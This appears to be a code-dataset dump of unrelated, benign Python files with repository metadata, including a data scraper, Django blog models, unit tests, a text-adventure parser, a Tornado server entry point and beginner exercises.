data['boiler'] = data['dom'].apply(lambda x : x.xpath(' //*[@id="Boiler_Manufacturer_1"]/@value')[0])
#scrape from description text using python string slicing
#offsets hard coded. not a good idea should the format change
data['units'] = data['description'].apply( lambda a : a[a.find('It has') + 7: a.find('It has')+9].rstrip() )
data['plant_type'] = data['description'].apply( lambda a : a[a.find('TYPE') + 5: a.find('with')].rstrip())
data['capacity'] = data['description'].apply( lambda a : a[a.find('capacity of') + 12:a.find('MWe')].rstrip())
data['operated_by'] = data['description'].apply( lambda a : a[a.find('operated by') + 12 :-1].rstrip() )
#prepare xls writeout
#------------------------
writeout = pd.DataFrame()
writeout['name'] = data['name']
writeout['description'] = data['description']
writeout['plant_type'] = data['plant_type']
writeout['capacity'] = data['capacity']
writeout['units'] = data['units']
writeout['boiler'] = data['boiler']
writeout['operated_by'] = data['operated_by']
writeout['url'] = data['url']
# write out to excel -- the needed format
# you can use .to_csv() to be more portable
writeout.to_excel('power_scrape.xls') | [
"tobie.nortje@gmail.com"
] | tobie.nortje@gmail.com |
0b9ddd370422b538b290ced7dd9b1346a382c886 | 79e75f2a7ff1f14ee542210c5103568cef86049e | /filters/__init__.py | 9fc6eba5dff3c579d249a8ed61d8106b807f9c39 | [] | no_license | CYBEX-P/cybexp-analytics | b72e6b7302cb8dfdd400f699df2c5ea0d9f6b3f9 | 6542ec5bc37d7e7231a1e9d4a89fd4ffc1fa1382 | refs/heads/master | 2023-06-28T07:13:31.688927 | 2021-07-27T18:26:01 | 2021-07-27T18:26:01 | 300,465,518 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 208 | py | from .common import set_filter_backend
from .cowrie import Cowrie
from .email import Email
from .openphish_feed import OpenPhishFeed
from .phishtank_feed import PhishTankFeed
from .sighting import Sighting
| [
"qclass@tutanota.com"
] | qclass@tutanota.com |
d5449150858c090ac9d6e21f3e003f0c65724c14 | c46020c71162f8843fe3f3d69d4e1b9a340a42f8 | /blogging/models.py | 9920f97ab368f6773d2dbc68985d90c52c118dcc | [] | no_license | davidbUW/django-blog | 2f99dc06d199f997c46b0d68660bf9b2c6277197 | d94a26435518ff4564d75ec1723cf29fb2bfddcf | refs/heads/master | 2023-01-30T15:53:13.442712 | 2020-11-25T01:30:27 | 2020-11-25T01:30:27 | 308,798,281 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 825 | py | from django.db import models # <-- This is already in the file
from django.contrib.auth.models import User
class Post(models.Model):
    # A blog entry authored by a Django auth User.
    title = models.CharField(max_length=128)
    text = models.TextField(blank=True)  # body text; may be left empty
    author = models.ForeignKey(User, on_delete=models.CASCADE)  # deleting the user deletes their posts
    created_date = models.DateTimeField(auto_now_add=True)  # set once on insert
    modified_date = models.DateTimeField(auto_now=True)  # refreshed on every save
    published_date = models.DateTimeField(blank=True, null=True)  # NULL until published
    def __str__(self):
        # Display name used by the admin and shell.
        return self.title
class Category(models.Model):
    # Label grouping posts; a post may belong to many categories.
    name = models.CharField(max_length=128)
    description = models.TextField(blank=True)
    posts = models.ManyToManyField(Post, blank=True, related_name='categories')  # reverse accessor: post.categories
    def __str__(self):
        return self.name
class Meta:
verbose_name_plural = 'Categories' | [
"dburnett2003@gmail.com"
] | dburnett2003@gmail.com |
6aa6276f3e070f43a2aa3ca62e6af7bdb4fe40ca | cac7c5aeb9e85898213c0eaa0b589793d8dafa03 | /variablePractice.py | 0e4cc6026887aacfd7f06effae43c5470a62f341 | [] | no_license | ccaguirre/variablePractice | d70d072f3648df991b0a56bcb6e9a63f4e74f7dd | e0f25e62be20fa0a2e3f497f5276e4f3e6bc6db1 | refs/heads/master | 2020-09-22T15:10:02.120168 | 2019-12-02T00:55:50 | 2019-12-02T00:55:50 | 225,253,711 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 782 | py | '''
Created on Dec 1, 2019
@author: ITAUser
'''
# Practice script: declare variables of each basic type and print them.
# --- integers (var3 aliases var2's value) ---
var1 = 5
print(var1)
var2 = 10
print(var2)
var3 = var2
print(var3)
x = 24
print(x)
y = 100
print (y)
# --- floats ---
z = 1.1
print(z)
a = 2.75
print(a)
b = a
print(b)
c = 100.1
print(c)
d = 12.3
print(d)
# --- strings ---
name = "Caleb"
print(name)
e = "c"
print(e)
f = "e"
print(f)
g = "chicken"
print(g)
h = "cal"
print(h)
# --- booleans ---
done=False
print(done)
smart = True
print(smart)
i = done
print(done)
j = False
print(j)
almostdone=True
print(almostdone)
# --- lists and index lookups; list.index() reports the FIRST position of
# a value, so the equal booleans (done, i, j are all False) all print 0.
list_int = [x,y,var1, var2,var3]
print(list_int.index(var1))
listString = [name,e,f,g,h]
print(listString.index(g))
listBoolean=[done,smart,i,j,almostdone]
print(listBoolean.index(done))
print(listBoolean.index(smart))
print(listBoolean.index(i))
print(listBoolean.index(j))
print(listBoolean.index(almostdone))
| [
"57292005+ccaguirre@users.noreply.github.com"
] | 57292005+ccaguirre@users.noreply.github.com |
8e076c6a3aa7960896001bd7acb4c650eb3e0ddf | b029b9ddbe7bbc2d7f82bbbfbfdcb71472bbf10c | /peepingtom/utils/tests/test_geometric_primitives.py | 3d237f42828b8908786842d9f4387080aca8d9a3 | [] | no_license | alisterburt/peepingtom | 48a74c80b14d5e4cf20ac9229268971eb858cd44 | 1e6084b2c25a9c54d0296c463c6e78e57245f0c3 | refs/heads/master | 2023-03-14T23:31:44.697388 | 2020-11-09T23:01:48 | 2020-11-09T23:01:48 | 310,046,036 | 0 | 0 | null | 2020-12-15T15:59:31 | 2020-11-04T15:41:56 | Python | UTF-8 | Python | false | false | 3,451 | py | import numpy as np
from numpy.testing import assert_almost_equal, assert_array_equal
from ..geometric_primitives import Point2D, Points2D, Point3D, Points3D
def test_point2d():
    """Point2D: construction, shape, x/y access, distance, centre of mass."""
    data = [1, 2]
    # test instantiation
    p = Point2D(data)
    assert isinstance(p, Point2D)
    # check dimensionality and shape
    assert p.ndim == 1
    assert p.shape == (2,)
    # check has parent attribute from Child class
    assert hasattr(p, 'parent')
    # check has attributes 'x' and 'y'
    assert hasattr(p, 'x')
    assert hasattr(p, 'y')
    # check attributes 'x' and 'y' are correct
    assert p.x == 1
    assert p.y == 2
    # check reshaping is working as expected: a (1, 2) input collapses to (2,)
    data = [[1, 2]]
    p = Point2D(data)
    assert p.shape == (2,)
    # check that distance_to method works
    distance = Point2D([0, 0]).distance_to_point([1, 1])
    assert_almost_equal(np.sqrt(2), distance, decimal=7)
    # check center of mass: for a single point it is the point itself
    assert_array_equal(p.center_of_mass, p)
    assert p.center_of_mass.ndim == 1
def test_points2d():
    """Points2D: 2D collection semantics, column accessors, reshaping."""
    data = np.arange(4).reshape(2, 2)
    # test instantiation
    p = Points2D(data)
    assert isinstance(p, Points2D)
    # check dimensionality and shape
    assert p.ndim == 2
    assert p.shape == (2, 2)
    # check center of mass (mean of the two rows [0, 1] and [2, 3])
    assert_array_equal(p.center_of_mass, [1, 2])
    # check distance to: from the centre of mass it must be zero
    assert_almost_equal(p.distance_to_point([1, 2]), 0)
    # check has attributes
    assert hasattr(p, 'x')
    assert hasattr(p, 'y')
    assert_array_equal(p.x, [0, 2])
    assert_array_equal(p.y, [1, 3])
    assert hasattr(p, 'parent')
    # check reshaping works correctly: a 1D input is promoted to one row
    data = np.arange(2)
    p = Points2D(data)
    assert p.ndim == 2
    assert p.shape == (1, 2)
def test_point3d():
    """Point3D: construction, shape, x/y/z access, distance, centre of mass."""
    data = [1, 2, 3]
    # test instantiation
    p = Point3D(data)
    assert isinstance(p, Point3D)
    # check dimensionality and shape
    assert p.ndim == 1
    assert p.shape == (3,)
    # check has parent attribute from Child class
    assert hasattr(p, 'parent')
    # check has attributes 'x', 'y' and 'z'
    assert hasattr(p, 'x')
    assert hasattr(p, 'y')
    assert hasattr(p, 'z')
    # check attributes 'x', 'y' and 'z' are correct
    assert p.x == 1
    assert p.y == 2
    assert p.z == 3
    # check reshaping is working as expected: (1, 3) collapses to (3,)
    data = [[1, 2, 3]]
    p = Point3D(data)
    assert p.shape == (3,)
    # check that distance_to method works
    distance = Point3D([0, 0, 0]).distance_to_point([1, 1, 1])
    assert_almost_equal(np.sqrt(3), distance, decimal=7)
    # check center of mass: for a single point it is the point itself
    assert_array_equal(p.center_of_mass, p)
    assert p.center_of_mass.ndim == 1
def test_points3d():
    """Points3D: 3D collection semantics, column accessors, reshaping."""
    data = np.arange(9).reshape(3, 3)
    # test instantiation
    p = Points3D(data)
    assert isinstance(p, Points3D)
    # check dimensionality and shape
    assert p.ndim == 2
    assert p.shape == (3, 3)
    # check center of mass (column means of rows [0..2], [3..5], [6..8])
    assert_array_equal(p.center_of_mass, [3, 4, 5])
    # check distance to: from the centre of mass it must be zero
    assert_almost_equal(p.distance_to_point([3, 4, 5]), 0)
    # check has attributes
    assert hasattr(p, 'x')
    assert hasattr(p, 'y')
    assert hasattr(p, 'z')
    assert_array_equal(p.x, [0, 3, 6])
    assert_array_equal(p.y, [1, 4, 7])
    assert_array_equal(p.z, [2, 5, 8])
    assert hasattr(p, 'parent')
    # check reshaping works correctly: a 1D input is promoted to one row
    data = np.arange(3)
    p = Points3D(data)
assert p.shape == (1, 3) | [
"alisterburt@gmail.com"
] | alisterburt@gmail.com |
92a9af4316d702f9f9fdb0850571ca25bca0aeac | c5c042694dd532682eb0a8a99e1382e66bdb18df | /models/Round4-/Xo-max_Yo-min_V-min_L-max_t-min.py | b69d3052384658d50eb4c972a99e2a8759b7ec23 | [
"MIT"
] | permissive | gehilley/NondimensionalWeathering | 63cafda88fa50c69d97153007c275a713a5127f7 | 5b1611780f0e1f8a579dadce4ee7725f71b0f718 | refs/heads/master | 2022-09-26T05:41:33.894944 | 2022-09-06T12:42:15 | 2022-09-06T12:42:15 | 232,174,788 | 0 | 0 | MIT | 2020-03-01T23:53:20 | 2020-01-06T19:56:21 | Python | UTF-8 | Python | false | false | 603 | py | filename = 'models/Xo-max_Yo-min_V-min_L-max_t-min.p'
from weathering_model.weathering_model import run_weathering_model
import numpy as np
import pickle as p
# Run model: one member of the parameter sweep (max X0, min Y0, min v,
# max L, min t, per the filename).
# NOTE(review): parameter meanings inferred from names (nondimensional
# domain length, initial concentrations, velocity); confirm against
# run_weathering_model's signature.
L_star = 1900
X0_star = 10.4
Y0_star = 0.000171
v_star = 0.255
nx = 101  # number of grid nodes used to derive the spatial step
t_star = np.array([0, 0.000017, 0.000035, 0.000052, 0.000070, 0.000087, 0.000104, 0.000122, 0.000139, 0.000157, 0.000174])
dx_star = L_star / float(nx)
x, X, Y = run_weathering_model(L_star, X0_star, v_star, Y0_star, t_star, dxstar=dx_star, method = 'DOP853')
# Use a context manager so the pickle file is flushed and closed even if
# dump raises (the original leaked the handle from open(..., 'wb')).
with open(filename, 'wb') as pickle_file:
    p.dump((x, X, Y, L_star, X0_star, Y0_star, v_star, nx, t_star, dx_star), pickle_file)
| [
"gehilley@gmail.com"
] | gehilley@gmail.com |
f5294106afea4b3866b4b8dcb792f1059fa780fe | b8ee1c31d716d8436ffce4f70107aecdf88f34ab | /parse.py | 979314dca394e2c3021121dfdfe948764de71c0b | [] | no_license | ExistNot/cs1113 | 1442c73251009a102f80cb529e77fcb6dd6ddcc0 | 28d17c10e7e05de65f0ca81bdf262adb1988b553 | refs/heads/master | 2021-04-28T18:53:31.044180 | 2018-02-13T01:16:35 | 2018-02-13T01:16:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,237 | py | import string # Used to strip user inputs of punctuation.
# Single-word commands with an implied verb, e.g. "n" -> ["go", "north"].
single_commands = {'go': {'north': ['north', 'n'], 'south': ['south', 's'], 'east': ['east', 'e'], 'west': ['west', 'w']}, 'check': {'inventory': ['inventory', 'i']}}
# Special one-word game commands handled outside the verb system.
game_commands = ['help', 'exit', 'quit', 'look']
# Canonical verb -> accepted synonyms (matched as prefixes of the input).
verbs = {'go': ['go', 'go to', 'walk', 'head', 'move'], \
         'take': ['take', 'pick up', 'grab', 'get'], \
         'give': ['give', 'hand'], \
         'drop': ['drop', 'put down', 'throw away'], \
         'open': ['open'], \
         'close': ['close', 'shut', 'slam'], \
         'equip': ['equip', 'put on', 'wear'], \
         'unequip': ['unequip', 'take off', 'remove'], \
         'use': ['use', 'apply'], \
         'check': ['check', 'look', 'examine', 'inspect'], \
         'attack': ['attack', 'fight', 'kill']}
# Words stripped out of multi-word commands during parsing.
prepositions = ["with", "to", "on", "from", "at"]
articles = ["a", "an", "the"]
def identify_verbs(text):
    """Normalise the leading verb of *text* to its canonical form.

    Returns [found_verb, text]: whether a known verb synonym prefixed the
    input, and the input with punctuation replaced by spaces and the
    synonym replaced by the canonical verb.
    NOTE(review): startswith() is a plain prefix match (e.g. "golf" would
    match the synonym "go"), and later verbs in the dict can re-match the
    already-rewritten text -- confirm this is intended.
    """
    found_verb = False
    if(len(text) > 0):
        for character in string.punctuation:
            text = text.replace(character, " ") # Strip away all punctuation.
        for verb in verbs.keys(): # This loop replaces any synonym that appears at the beginning of the user's input with their generic verb equivalent.
            for synonym in verbs[verb]: # e.g. "look at door" becomes "check door".
                if text.startswith(synonym):
                    text = text[len(synonym):] # Strip the synonym from the beginning of the user's input.
                    text = verb + text # Put the generic verb equivalent at the beginning of the string.
                    found_verb = True # Let the code later on know that we found a matching verb.
    return [found_verb, text]
def strip_articles(text):
    """Drop article words ("a", "an", "the") from *text*, squeezing the
    spacing left behind, and return the rebuilt string."""
    if not text:
        return text
    kept_words = [word for word in text.split(" ")
                  if word and word not in articles]
    return " ".join(kept_words)
def parse_command(text, found_verb = True):
    """Split a normalised command string into [VERB, NOUN, ...] tokens.

    Single words are matched against game_commands and single_commands;
    longer inputs are split on prepositions so that e.g.
    "give sword to guard" becomes ["give", "sword", "guard"].
    Returns None when the input is empty or unrecognisable.
    """
    if(len(text) > 0):
        text = text.split(" ") # Split the text up into a list of words.
        if(len(text) == 1): # Stop here if we have a special in-game command such as "help" or "quit".
            for command in game_commands:
                if(text[0] == command):
                    return text
            for verb in single_commands.keys(): # This set of loops replaces any listed single word command synonyms with their generic command equivalent and adds their implied verb.
                for command in single_commands[verb].keys(): # e.g. ["i"] becomes ["check", "inventory"]
                    for synonym in single_commands[verb][command]:
                        if text[0] == synonym:
                            text.insert(0, verb)
                            text[1] = command
                            return text
            if(found_verb):
                return text
            else:
                return None # Return empty-handed if no matching commands were found.
        elif(len(text) == 2):
            if not found_verb:
                text[0] = None # Get rid of the verb if we do not recognize it.
            return text # Return what's left of the user's input. If a verb was found, this will return input in the form [VERB, NOUN].
                        # If no verb was found, this will return [None, NOUN]
        elif(len(text) > 2):
            if not found_verb:
                text[0] = None
            for preposition in prepositions:
                if (text[1] == preposition):
                    return [text[0], None] # Commands with a preposition following a verb are invalid.
            index = 2
            while(index < len(text)):
                found_preposition = False
                for preposition in prepositions:
                    if (text[index] == preposition):
                        found_preposition = True
                if(found_preposition):
                    # Drop the preposition; the index bump keeps the word
                    # after it as the START of a new object token instead
                    # of merging it into the previous noun.
                    text.pop(index)
                    index += 1
                else:
                    # Merge consecutive non-preposition words into one
                    # multi-word token, e.g. "big door".
                    text[index - 1] += " " + text[index]
                    text.pop(index)
            return text
    else: # Return empty handed if there is no user input.
        return None
def get_command():
    """Read one line from the player and run the full parsing pipeline:
    verb normalisation -> article stripping -> command tokenisation."""
    text = input('>> ').lower()
    [found_verb, user_input] = identify_verbs(text)
    user_input = strip_articles(user_input)
    user_input = parse_command(user_input, found_verb)
return [text, user_input] | [
"stevenfoland@tsogiants.org"
] | stevenfoland@tsogiants.org |
82943776287d418612f095bed943ef0de30beea2 | 871648ff8167029d6fab6f41ccdb4cb025b9f90b | /src/main.py | c91ee13f12be6c2cde7571359e798e8abadf8d60 | [] | no_license | zn-chen/dockerlab | 33f1f72db7b242eea3719920f02deb52d1245f55 | d64996969c9deda02ed6e2089b2e30f8318b7aaf | refs/heads/master | 2023-03-07T08:37:29.963901 | 2019-09-19T11:10:01 | 2019-09-19T11:10:01 | 209,507,478 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,295 | py | # -*- coding: utf-8 -*-
import sys
import os
import time
from signal import signal, SIGINT, SIGTERM
from tornado.ioloop import IOLoop
from tornado.web import Application
from tornado.options import options, define
from tornado.netutil import bind_sockets
from tornado.httpserver import HTTPServer
from tornado.log import gen_log
from router import ROUTER
from conf import Config
import scheduled
LOGO = """
╔╦╗┌─┐┌─┐┬┌─┌─┐┬─┐╦ ┌─┐┌┐
║║│ ││ ├┴┐├┤ ├┬┘║ ├─┤├┴┐
═╩╝└─┘└─┘┴ ┴└─┘┴└─╩═╝┴ ┴└─┘"""
class Entry(object):
    """
    Program entry point: wires up configuration, logging, the HTTP server
    and the tornado IOLoop.  (Docstrings translated from Chinese.)
    """
    def __init__(self):
        """
        Constructor: bind listening sockets, initialise options, install
        SIGINT/SIGTERM handlers and build the HTTP server.
        """
        self._config = Config
        self._options = options
        self._ioloop = IOLoop.current()
        self._sockets = bind_sockets(self._config.base_port)
        self._init_options()
        # exit signal: route SIGINT/SIGTERM through the IOLoop so stop()
        # runs on the loop thread
        signal(SIGINT, lambda sig, frame: self._ioloop.add_callback_from_signal(self.stop))
        signal(SIGTERM, lambda sig, frame: self._ioloop.add_callback_from_signal(self.stop))
        self._server = HTTPServer(Application(**self._settings))
    def _init_options(self):
        """
        Initialise tornado options: application settings and logging
        (level, file rotation, stderr output).
        :return:
        """
        # make application setting
        self._settings = {
            r'handlers': ROUTER,
        }
        # init log
        self._options.logging = self._config.log_level
        # log to file
        if self._config.log_to_file:
            self._options.log_rotate_mode = self._config.log_rotate_mode
            # rotate by time interval
            if self._config.log_rotate_mode == "time":
                self._options.log_rotate_when = self._config.log_rotate_when
                self._options.log_rotate_interval = self._config.log_rotate_interval
            # rotate by file size
            elif self._config.log_rotate_mode == "size":
                self._options.log_max_size = self._config.log_file_max_size
            else:
                # TODO notify about failed log initialisation (unknown rotate mode)
                pass
            self._options.log_file_num_backups = self._config.log_file_num_backups
            options.log_file_prefix = r'{0:s}/runtime-{1:s}.pid-{2:s}.log'.format(
                self._config.log_file_path,
                time.strftime("%Y-%m-%d", time.localtime()),
                str(os.getpid()),
            )
        # log to stderr
        self._options.log_to_stderr = self._config.log_to_stderr
        # start log
        self._options.parse_command_line()
        gen_log.info("configuration initialization")
    def start(self):
        """
        Start serving: attach the bound sockets, launch scheduled tasks
        and run the IOLoop (blocks until stop()).
        :return:
        """
        gen_log.info(LOGO)
        self._server.add_sockets(self._sockets)
        gen_log.info("tornado service start")
        scheduled.start()
        gen_log.info("scheduled task start")
        self._ioloop.start()
    def stop(self, code=0, frame=None):
        """
        Stop the tornado service and exit the process.
        :return:
        """
        self._server.stop()
        gen_log.info("http service stop")
        self._ioloop.stop()
        gen_log.info("tornado service exit")
        sys.exit(0)
if __name__ == r'__main__':
    # Build the entry object and serve until a stop signal arrives.
    Entry().start()
| [
"2972789494@qq.com"
] | 2972789494@qq.com |
6c917765f0811b156ddda90eac4c87e9f06185f7 | f98c9dea0e212be5c7bc3161499e5633383bd4d7 | /python/fruit_package_module_test.py | c82839cdcdd29c508d4f8791380d7717c7237b7c | [
"MIT"
] | permissive | ysoftman/test_code | dddb5bee3420977bfa335320a09d66e5984403f5 | 0bf6307073081eeb1d654a1eb5efde44a0bdfe1e | refs/heads/master | 2023-08-17T05:45:49.716829 | 2023-08-16T05:00:09 | 2023-08-16T05:00:09 | 108,200,568 | 4 | 0 | MIT | 2023-03-15T04:23:10 | 2017-10-25T00:49:26 | C++ | UTF-8 | Python | false | false | 509 | py | # 패키지(모듈이 모인 디렉토리)가 이닌 모듈이 같은 경로에 있는 경우
# import fruite_module as fm
# Use package.module through an alias.  (Comments translated from Korean.)
import fruite_package.fruit_module as fm
fm.fruit.apple(100)
fm.fruit.lemon("2000")
# Import everything the package.module exposes into this namespace.
from fruite_package.fruit_module import *
fruit.apple(100)
# Use the fruit class from the package.module under the name fr.
from fruite_package.fruit_module import fruit as fr
fr.lemon(200)
fr.apple(50)
fr.orange(100)
| [
"ysoftman@gmail.com"
] | ysoftman@gmail.com |
22cff3945dd868a9c060382d1020722c7a4d2eea | 4a08ae605a8f96146b14881330d21317a67e225d | /data_types/question17.py | a245b912a288e46b12cce2f9783bf7dbe0c76b56 | [] | no_license | alex1the1great/Assignment | dd6083a2196d9bae36bb66bf12a2bdc07a0b93e8 | 5a806668c3bfc0d9750421c4ae287f19cbf36fc7 | refs/heads/master | 2022-11-13T11:07:13.875607 | 2020-06-29T03:51:17 | 2020-06-29T03:51:17 | 275,724,898 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 361 | py | import re
print('Example: 1 2 3 4 5')
numbers = input('Enter list of numbers separate with space:')
pattern = r'^[0-9\s]+$'
check_multi = re.findall(pattern, numbers)
if not check_multi:
print('Please enter valid format')
else:
total = numbers.split(' ')
product = 1
for i in total:
i = int(i)
product *= i
print(product)
| [
"asimshrestha608@gmail.com"
] | asimshrestha608@gmail.com |
61c9adc27d3ef6c82ea3776400b18ef2ca1d64d9 | 4680d397b8226145d6c13a42b4dee9946576f0c3 | /cop_exe/consts.py | fe50bb941ef37d86bdf825775db43a56b8ef5813 | [
"MIT"
] | permissive | Gaming32/COP.EXE | c91e8f8d5a6b82a948ce76b9fd43ff910a381a85 | 52fb496174bd0a334c0509cc03fdf926c8551565 | refs/heads/main | 2023-04-22T02:49:13.897139 | 2021-04-04T23:23:58 | 2021-04-04T23:23:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 285 | py | Color = tuple[int, int, int]
ColorTransp = tuple[int, int, int, int]
FRAMERATE: float = 75
WINDOW_SIZE: tuple[int, int] = (1280, 720)
CLEAR_COLOR: Color = (64, 64, 64)
PLAYER_COLOR: Color = (0, 255, 0)
ENEMY_COLOR: Color = (255, 0, 0)
CHARACTER_OPACITY: int = 96
BLINK_TIME = 0.75
| [
"soujournme@gmail.com"
] | soujournme@gmail.com |
97103fe9f296505d004259772c99bf85a9614fb2 | d4c870aaea2eb0d2299bfc24e2a2cf57203c1796 | /0701.insert-into-a-binary-search-tree/insert-into-a-binary-search-tree.py | 571c42ef15af239c4bbc60e066218566313f95f0 | [] | no_license | koten0224/Leetcode | 99a8ab369ffdc40b8e23b32b3fb95e248483f87f | 304fa8289d8f8b2084ee62662b0fcfd3b1cb929a | refs/heads/master | 2020-06-02T23:06:17.367723 | 2019-11-17T15:50:09 | 2019-11-17T15:50:09 | 191,337,592 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 454 | py | # Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
    def insertIntoBST(self, root: TreeNode, val: int) -> TreeNode:
        """Insert ``val`` into the BST rooted at ``root``; return the root.

        An empty subtree becomes a new leaf node. Otherwise recurse into
        the side dictated by BST ordering (values <= root.val go left).
        """
        if root is None:
            return TreeNode(val)
        if val > root.val:
            root.right = self.insertIntoBST(root.right, val)
        else:
            root.left = self.insertIntoBST(root.left, val)
        return root
"koten0224@gmail.com"
] | koten0224@gmail.com |
119135e1d0bacf9933f1f45fe9d6140728236592 | 16279dd5c697aae3bacca8f4c894460ccbcaee00 | /TP3/cmu_112_graphics.py | 68b7c8b814c5493a9cc788e390e6a0afcb78dfc5 | [] | no_license | zymason/15112-TP | 4c5fab7adeb59bd6d096e0ddeca743898d750669 | 05f19f185edf0525ecee5f18db9d6a8bef80bcce | refs/heads/master | 2023-04-18T18:43:32.538537 | 2021-05-05T04:38:37 | 2021-05-05T04:38:37 | 357,681,470 | 1 | 0 | null | 2021-05-05T04:26:02 | 2021-04-13T20:33:44 | Python | UTF-8 | Python | false | false | 33,898 | py | # cmu_112_graphics.py
# version 0.9.0
# Pre-release for CMU 15-112-s21
# Require Python 3.6 or later
import sys
if ((sys.version_info[0] != 3) or (sys.version_info[1] < 6)):
raise Exception('cmu_112_graphics.py requires Python version 3.6 or later.')
# Track version and file update timestamp
import datetime
MAJOR_VERSION = 0
MINOR_VERSION = 9.0 # version 0.9.0
LAST_UPDATED = datetime.date(year=2021, month=4, day=12)
# Pending changes:
# * Fix Windows-only bug: Position popup dialog box over app window (already works fine on Macs)
# * Add documentation
# * integrate sounds (probably from pyGame)
# * Improved methodIsOverridden to Ultimate_TTT and ModalApp
# * Save to animated gif and/or mp4 (with audio capture?)
# Deferred changes:
# * replace/augment tkinter canvas with PIL/Pillow imageDraw (perhaps with our own fn names)
# Changes in v0.9.0
# * added simpler top-level modes implementation that does not include mode objects
# * added ImageDraw and ImageFont to PIL imports
# Changes in v0.8.8
# * added __repr__ methods so:
# * print(event) works and prints event.key or event.x + event.y
# * print(app) works and prints just the user defined app fields
# Changes in v0.8.7
# * removed modes (for now)
# Changes in v0.8.6
# * s21
# Changes in v0.8.5
# * Support loadImage from Modes
# Changes in v0.8.3 + v0.8.4
# * Use default empty Mode if none is provided
# * Add KeyRelease event binding
# * Drop user32.SetProcessDPIAware (caused window to be really tiny on some Windows machines)
# Changes in v0.8.1 + v0.8.2
# * print version number and last-updated date on load
# * restrict modifiers to just control key (was confusing with NumLock, etc)
# * replace hasModifiers with 'control-' prefix, as in 'control-A'
# * replace app._paused with app.paused, etc (use app._ for private variables)
# * use improved ImageGrabber import for linux
# Changes in v0.8.0
# * suppress more modifier keys (Super_L, Super_R, ...)
# * raise exception on event.keysym or event.char + works with key = 'Enter'
# * remove tryToInstall
# Changes in v0.7.4
# * renamed drawAll back to redrawAll :-)
# Changes in v0.7.3
# * Ignore mousepress-drag-release and defer configure events for drags in titlebar
# * Extend deferredRedrawAll to 100ms with replace=True and do not draw while deferred
# (together these hopefully fix Windows-only bug: file dialog makes window not moveable)
# * changed sizeChanged to not take event (use app.width and app.height)
# Changes in v0.7.2
# * Singleton App._theRoot instance (hopefully fixes all those pesky Tkinter errors-on-exit)
# * Use user32.SetProcessDPIAware to get resolution of screen grabs right on Windows-only (fine on Macs)
# * Replaces showGraphics() with runApp(...), which is a veneer for App(...) [more intuitive for pre-OOP part of course]
# * Fixes/updates images:
# * disallows loading images in redrawAll (raises exception)
# * eliminates cache from loadImage
# * eliminates app.getTkinterImage, so user now directly calls ImageTk.PhotoImage(image))
# * also create_image allows magic pilImage=image instead of image=ImageTk.PhotoImage(app.image)
# Changes in v0.7.1
# * Added keyboard shortcut:
# * cmd/ctrl/alt-x: hard exit (uses os._exit() to exit shell without tkinter error messages)
# * Fixed bug: shortcut keys stopped working after an MVC violation (or other exception)
# * In app.saveSnapshot(), add .png to path if missing
# * Added: Print scripts to copy-paste into shell to install missing modules (more automated approaches proved too brittle)
# Changes in v0.7
# * Added some image handling (requires PIL (retained) and pyscreenshot (later removed):
# * app.loadImage() # loads PIL/Pillow image from file, with file dialog, or from URL (http or https)
# * app.scaleImage() # scales a PIL/Pillow image
# * app.getTkinterImage() # converts PIL/Pillow image to Tkinter PhotoImage for use in create_image(...)
# * app.getSnapshot() # get a snapshot of the canvas as a PIL/Pillow image
# * app.saveSnapshot() # get and save a snapshot
# * Added app._paused, app.togglePaused(), and paused highlighting (red outline around canvas when paused)
# * Added keyboard shortcuts:
# * cmd/ctrl/alt-s: save a snapshot
# * cmd/ctrl/alt-p: pause/unpause
# * cmd/ctrl/alt-q: quit
# Changes in v0.6:
# * Added fnPrefix option to Ultimate_TTT (so multiple Ultimate_TTT's can be in one file)
# * Added showGraphics(drawFn) (for graphics-only drawings before we introduce animations)
# Changes in v0.5:
# * Added:
# * app.winx and app.winy (and add winx,winy parameters to app.__init__, and sets these on configure events)
# * app.setSize(width, height)
# * app.setPosition(x, y)
# * app.quit()
# * app.showMessage(message)
# * app.getUserInput(prompt)
# * App.lastUpdated (instance of datetime.date)
# * Show popup dialog box on all exceptions (not just for MVC violations)
# * Draw (in canvas) "Exception! App Stopped! (See console for details)" for any exception
# * Replace callUserMethod() with more-general @_safeMethod decorator (also handles exceptions outside user methods)
# * Only include lines from user's code (and not our framework nor tkinter) in stack traces
# * Require Python version (3.6 or greater)
# Changes in v0.4:
# * Added __setattr__ to enforce Type 1A MVC Violations (setting app.x in redrawAll) with better stack trace
# * Added app._deferredRedrawAll() (avoids resizing drawing/crashing bug on some platforms)
# * Added deferredMethodCall() and app._afterIdMap to generalize afterId handling
# * Use (_ is None) instead of (_ == None)
# Changes in v0.3:
# * Fixed "event not defined" bug in sizeChanged handlers.
# * draw "MVC Violation" on Type 2 violation (calling draw methods outside redrawAll)
# Changes in v0.2:
# * Handles another MVC violation (now detects drawing on canvas outside of redrawAll)
# * App stops running when an exception occurs (in user code) (stops cascading errors)
# Changes in v0.1:
# * OOPy + supports inheritance + supports multiple apps in one file + etc
# * uses import instead of copy-paste-edit starter code + no "do not edit code below here!"
# * no longer uses Struct (which was non-Pythonic and a confusing way to sort-of use OOP)
# * Includes an early version of MVC violation handling (detects model changes in redrawAll)
# * added events:
# * appStarted (no init-vs-__init__ confusion)
# * appStopped (for cleanup)
# * keyReleased (well, sort of works) + mouseReleased
# * mouseMoved + mouseDragged
# * sizeChanged (when resizing window)
# * improved key names (just use event.key instead of event.char and/or event.keysym + use names for 'Enter', 'Escape', ...)
# * improved function names (renamed redrawAll to drawAll)
# * improved (if not perfect) exiting without that irksome Tkinter error/bug
# * app has a title in the titlebar (also shows window's dimensions)
# * supports Modes and ModalApp (see ModalApp and Mode, and also see TestModalApp example)
# * supports Ultimate_TTT (using top-level functions instead of subclasses and methods)
# * supports version checking with App.majorVersion, App.minorVersion, and App.version
# * logs drawing calls to support autograding views (still must write that autograder, but this is a very helpful first step)
from tkinter import *
from tkinter import messagebox, simpledialog, filedialog
import inspect, copy, traceback
import sys, os
from io import BytesIO
def failedImport(importName, installName=None):
    """Print a banner warning that *importName* could not be imported.

